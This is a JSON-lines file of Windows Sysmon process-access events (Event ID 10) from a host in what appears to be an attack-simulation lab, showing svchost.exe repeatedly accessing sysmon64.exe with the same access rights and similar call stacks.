{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1602,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1603,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1604,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1605,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.351\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.351","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1606,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.351\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.351","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1607,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.351\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.351","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1608,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.351\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.351","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1609,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.351\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.351","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
